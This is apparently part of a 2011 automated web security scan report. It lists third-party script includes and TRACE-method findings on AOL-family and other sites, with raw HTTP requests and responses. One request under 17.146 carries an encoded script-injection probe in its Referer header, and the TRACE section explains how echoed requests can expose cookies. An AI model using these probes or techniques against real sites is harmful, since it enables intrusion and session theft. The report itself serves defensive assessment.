Path:   /Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://s3.amazonaws.com/mmawarehouse/js/popup.js
  • https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 66593
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=32062; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=PCIDGODBKOKMLDILKMODCCGD; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="stylesheet" href="//s3.amazonaws.com/mmawarehouse/css/scroller.css"/>

<script type="text/javascript" src="//s3.amazonaws.com/mmawarehouse/js/popup.js"></script>
...[SNIP]...
<div id="footer_geotrust"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...

17.139. http://www.mmawarehouse.com/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mmawarehouse.com
Path:   /Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://s3.amazonaws.com/mmawarehouse/js/popup.js
  • https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 70569
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=33949; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=IDIDGODBDNKIGNLKGFIAJFAI; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="stylesheet" href="//s3.amazonaws.com/mmawarehouse/css/scroller.css"/>

<script type="text/javascript" src="//s3.amazonaws.com/mmawarehouse/js/popup.js"></script>
...[SNIP]...
<div id="footer_geotrust"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...

17.140. http://www.moviefone.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moviefone.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/os/aol/jquery-1.4.3.min.js
  • http://o.aolcdn.com/videoplayer/loader.js

Request

GET / HTTP/1.1
Host: www.moviefone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:48 GMT
Server: Apache/2.2
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:48 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 108838


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="eng" xmlns:og="http://openg
...[SNIP]...
</script>    <script src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/videoplayer/loader.js"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="http://o.aolcdn.com/os/aol/jquery-1.4.3.min.js"></script>
...[SNIP]...

17.141. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outblush.com
Path:   /|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The response dynamically includes the following script from another domain:
  • http://outblushcom.skimlinks.com/api/skimlinks.js

Request

GET /|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.outblush.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 11004
Date: Thu, 05 May 2011 10:58:54 GMT
Age: 0
Connection: close
Server: IBSrv 1.0
Set-Cookie: BIGipServerbargainist_POOL=1509626028.52514.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://outblushcom.skimlinks.com/api/skimlinks.js"></script>
...[SNIP]...

17.142. http://www.popeater.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popeater.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/art/_media/ke_tools/mmx_refresh_patch.js
  • http://o.aolcdn.com/art/merge/?f=/popeater/sonar2.js&f=/popeater/cross-promo.js&f=/popeater/popeater.js&f=/us_popeater/profile_ajax.js&f=/us_popeater/profile_main.js&expsec=31536000&ver=1i
  • http://o.aolcdn.com/art/webwidgets/sfsw_v1_3/feeds_subscribe_en_us.js
  • http://o.aolcdn.com/feedback/feedback1.js
  • http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.4.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js
  • http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss.min.js&file=/aol/jquery.shorturl.min.js&file=/aol/jquery.openwindow.min.js&file=/aol/jquery.aolshare-1.2.min.js&ver=4
  • http://www.aolcdn.com/keyexp/kits/ke_kits.js
  • http://www.blogsmithmedia.com/www.popeater.com/include/related-links.js
  • http://www.blogsmithmedia.com/www.popeater.com/include/tabbed-search-header.js?2

Request

GET / HTTP/1.1
Host: www.popeater.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:54 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:54 GMT; path=/
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 60728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<link type="text/css" rel="stylesheet" media="screen, projection" href="http://www.aolcdn.com/ke/dm/definingmoments-v4.css" />
   <script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</style>

<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.4.min.js&amp;file=/aol/jquery.getjs-1.0.min.js&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js" type="text/javascript"></script>

<script src="http://o.aolcdn.com/art/merge/?f=/popeater/sonar2.js&f=/popeater/cross-promo.js&f=/popeater/popeater.js&f=/us_popeater/profile_ajax.js&f=/us_popeater/profile_main.js&expsec=31536000&ver=1i" type="text/javascript"></script>

<script type="text/javascript" src="http://www.blogsmithmedia.com/www.popeater.com/include/tabbed-search-header.js?2"></script>
<script type="text/javascript" src="http://www.blogsmithmedia.com/www.popeater.com/include/related-links.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="http://o.aolcdn.com/art/webwidgets/sfsw_v1_3/feeds_subscribe_en_us.css" />
       <script type="text/javascript" src="http://o.aolcdn.com/art/webwidgets/sfsw_v1_3/feeds_subscribe_en_us.js"></script>
       <script src="http://o.aolcdn.com/feedback/feedback1.js" type="text/javascript"></script>
...[SNIP]...
<div class="galleryLauncher"><script src='http://www.aolcdn.com/keyexp/kits/ke_kits.js' type='text/javascript' language='javascript' charset='utf-8'></script>
...[SNIP]...
</div>    

    <script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss.min.js&file=/aol/jquery.shorturl.min.js&file=/aol/jquery.openwindow.min.js&file=/aol/jquery.aolshare-1.2.min.js&ver=4" type="text/javascript"></script>
...[SNIP]...
</body>
<script type="text/javascript" src="http://o.aolcdn.com/art/_media/ke_tools/mmx_refresh_patch.js"></script>
...[SNIP]...

17.143. http://www.truveo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truveo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://connect.facebook.net/en_US/all.js
  • http://d1.openx.org/spcjs.php?id=16336
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/omniunih.js
  • http://secure.quantserve.com/quant.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET / HTTP/1.1
Host: www.truveo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ab=univ_ent; showAdult=0; unique=c2463cfb4c02503-f77cacedeed180d; PHPSESSID=l7a2hsj410v4vqu1e6743unjl4

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.3
Set-Cookie: ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
Set-Cookie: queryhistory=deleted; expires=Wed, 05-May-2010 00:58:21 GMT; path=/; domain=.truveo.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=l7a2hsj410v4vqu1e6743unjl4; path=/
Access-Control-Allow-Oritin: *
Content-Type: text/html; charset=utf-8
Content-Length: 83513

<!DOCTYPE HTML>
<html class="no-js">
<head>
<title>Truveo Video Search</title>
<script type="text/javascript">
<!--
SpriteImg = new Image();
SpriteImg.src = "http://www.truveo.com/client/versions/uni
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js" type="text/javascript"></script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<center>
<script type='text/javascript' src='http://d1.openx.org/spcjs.php?id=16336'></script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

17.144. http://www.truveo.com/client/versions/univ_ent/js/truveo.libs.util.v1304543460.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truveo.com
Path:   /client/versions/univ_ent/js/truveo.libs.util.v1304543460.js

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /client/versions/univ_ent/js/truveo.libs.util.v1304543460.js HTTP/1.1
Host: www.truveo.com
Proxy-Connection: keep-alive
Referer: http://www.truveo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: showAdult=0; unique=c2463cfb4c02503-f77cacedeed180d; ab=univ_ent; PHPSESSID=l7a2hsj410v4vqu1e6743unjl4

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.3
Expires: Mon, 28 Jul 2014 23:30:00 GMT
Cache-Control: max-age=315360000
Access-Control-Allow-Oritin: *
Content-Type: application/x-javascript
Content-Length: 35730

//alert('loading util.truveo.js');
/*--------------------------------------------------
Class Hook: Allows to classify your functions into
sub-classes and then run them all in

...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

17.145. http://www.truveo.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truveo.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://connect.facebook.net/en_US/all.js
  • http://d1.openx.org/spcjs.php?id=16336
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/omniunih.js
  • http://secure.quantserve.com/quant.js
  • http://static.addtoany.com/menu/page.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /search HTTP/1.1
Host: www.truveo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 00:57:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.3
Set-Cookie: unique=770f667cc0f81d1-7132dc48a8cf32a; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
Set-Cookie: showAdult=0; expires=Sat, 04-Jun-2011 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: unique=9859c0e0799d06e-bf4dcf15a92aa35; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: queryhistory=deleted; expires=Wed, 05-May-2010 00:56:59 GMT; path=/; domain=.truveo.com
Set-Cookie: PHPSESSID=q63egmjqep6m7rjtv5e7epons1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.truveo.com/
Access-Control-Allow-Oritin: *
Content-Type: text/html; charset=utf-8
Content-Length: 105095

<!DOCTYPE HTML>
<html class="no-js">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link title="Truveo Video Search" type="application/opensearchdescription+xml" rel
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js" type="text/javascript"></script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<center>
<script type='text/javascript' src='http://d1.openx.org/spcjs.php?id=16336'></script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script> -->
               <script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

17.146. http://www.tuaw.com/hub/app-reviews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tuaw.com
Path:   /hub/app-reviews

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://cdn-static.viddler.com/js/replacer.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/omniunih.js
  • http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.2.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js
  • http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.2.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&os=4&file=/aol/jquery.openwindow.min.js&file=/aol/jquery.shorturl.min.js&file=/aol/jquery.aolshare.min.js
  • http://www.blogsmithmedia.com/learn2.aol.com/static/learn.deploy.js
  • http://www.blogsmithmedia.com/www.tuaw.com/include/contact.js
  • http://www.blogsmithmedia.com/www.tuaw.com/include/jquery-globalheader.js
  • http://www.blogsmithmedia.com/www.tuaw.com/include/jquery-globalsearchbox.js
  • http://www.blogsmithmedia.com/www.tuaw.com/include/pr-hider.js
  • http://www.flickr.com/badge_code_v2.gne?show_name=1&count=3&display=latest&size=t&layout=h&source=all_tag&tag=tuaw&user=15453323%40N00

Request

GET /hub/app-reviews HTTP/1.1
Host: www.tuaw.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size7b4de%22%3E%3Cscript%3Ealert(1)%3C/script%3E118786fa1f1=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:15 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 14:06:15 GMT; path=/
Content-Type: text/html
Content-Length: 32604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>iPhone and iPod touc
...[SNIP]...
<link rel="apple-touch-icon" href="http://www.blogsmithmedia.com/www.tuaw.com/media/apple-touch-icon-v2.png" type="image/png" />
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
<tr>
<script type="text/javascript" src="http://www.flickr.com/badge_code_v2.gne?show_name=1&count=3&display=latest&size=t&layout=h&source=all_tag&tag=tuaw&user=15453323%40N00"></script>
...[SNIP]...
</script><script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.2.min.js&amp;file=/aol/jquery.getjs-1.0.min.js&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js" type="text/javascript"></script>
<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.2.min.js&amp;file=/aol/jquery.getjs-1.0.min.js&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js&amp;os=4&amp;file=/aol/jquery.openwindow.min.js&amp;file=/aol/jquery.shorturl.min.js&amp;file=/aol/jquery.aolshare.min.js" type="text/javascript"></script>
<script type="text/javascript" src="http://www.blogsmithmedia.com/www.tuaw.com/include/contact.js"></script>
<script type="text/javascript" src="http://www.blogsmithmedia.com/www.tuaw.com/include/pr-hider.js"></script>
<script type="text/javascript" src="http://www.blogsmithmedia.com/www.tuaw.com/include/jquery-globalheader.js"></script>
<script type="text/javascript" src="http://www.blogsmithmedia.com/www.tuaw.com/include/jquery-globalsearchbox.js"></script>
...[SNIP]...
</script>
<script src="http://cdn-static.viddler.com/js/replacer.js"> </script>
...[SNIP]...
</html>
<script src="http://www.blogsmithmedia.com/learn2.aol.com/static/learn.deploy.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

17.147. http://yellowpages.aol.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yellowpages.aol.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://o.aolcdn.com/omniunih.js
  • http://o.aolcdn.com/yp/statics/aolyp/js131010/i18ntext.js
  • http://o.aolcdn.com/yp/statics/aolyp/js131010/locmngr.js
  • http://o.aolcdn.com/yp/statics/aolyp/js131010/prototype.js
  • http://o.aolcdn.com/yp/statics/aolyp/js131010/yp.js

Request

GET /?icid=navbar_YP_main5 HTTP/1.1
Host: yellowpages.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575100634-Repeat%7C1367647100634%3B%20s_nrgvo%3DRepeat%7C1367647100636%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=17224104F8E073DB96F56D00E1212059; Path=/yellowpages
Set-Cookie: recentSearches=; Domain=yellowpages.aol.com; Expires=Fri, 04-May-2012 00:59:15 GMT; Path=/
Set-Cookie: recentlocations=; Domain=yellowpages.aol.com; Expires=Fri, 04-May-2012 00:59:15 GMT; Path=/
Set-Cookie: reqId=ae3b17aa1bed2d84; Domain=yellowpages.aol.com; Path=/
Set-Cookie: sess_id=3fd40c2ad4939b38; Domain=yellowpages.aol.com; Expires=Thu, 05-May-2011 01:29:15 GMT; Path=/
Set-Cookie: local_guid=7b579074211441ec; Domain=yellowpages.aol.com; Expires=Fri, 04-May-2012 00:59:15 GMT; Path=/
Content-Length: 38832

<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script><script type="text/javascript"
   src="http://o.aolcdn.com/yp/statics/aolyp/js131010/prototype.js">
</script><script type="text/javascript"
   src="http://o.aolcdn.com/yp/statics/aolyp/js131010/i18ntext.js" >
</script><script type="text/javascript"
   src="http://o.aolcdn.com/yp/statics/aolyp/js131010/yp.js">
</script><script type="text/javascript"
   src="http://o.aolcdn.com/yp/statics/aolyp/js131010/locmngr.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...

18. TRACE method is enabled
There are 12 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


18.1. http://www.aim.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aim.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aim.com
Cookie: e4208140e9f6ef90

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:51 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aim.com
Cookie: e4208140e9f6ef90
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243


18.2. http://www.aolnews.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aolnews.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aolnews.com
Cookie: e98c48ca3b0eac0e

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:19 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aolnews.com
Cookie: e98c48ca3b0eac0e
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:19:B648:200483,x-lb-client-ip:ajg_u


18.3. http://www.citysbest.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.citysbest.com
Cookie: 2a68d37c3676e45f

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:37 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.citysbest.com
Cookie: 2a68d37c3676e45f
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:26:D7F9:200483,x-lb-client-ip:ajg_u


18.4. http://www.crunchboard.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crunchboard.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.crunchboard.com
Cookie: 909a9a7d36bb21dd

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 11:10:34 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.crunchboard.com
Cookie: 909a9a7d36bb21dd


18.5. http://www.dailyfinance.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailyfinance.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dailyfinance.com
Cookie: 1690502dfd21ec63

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:36 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
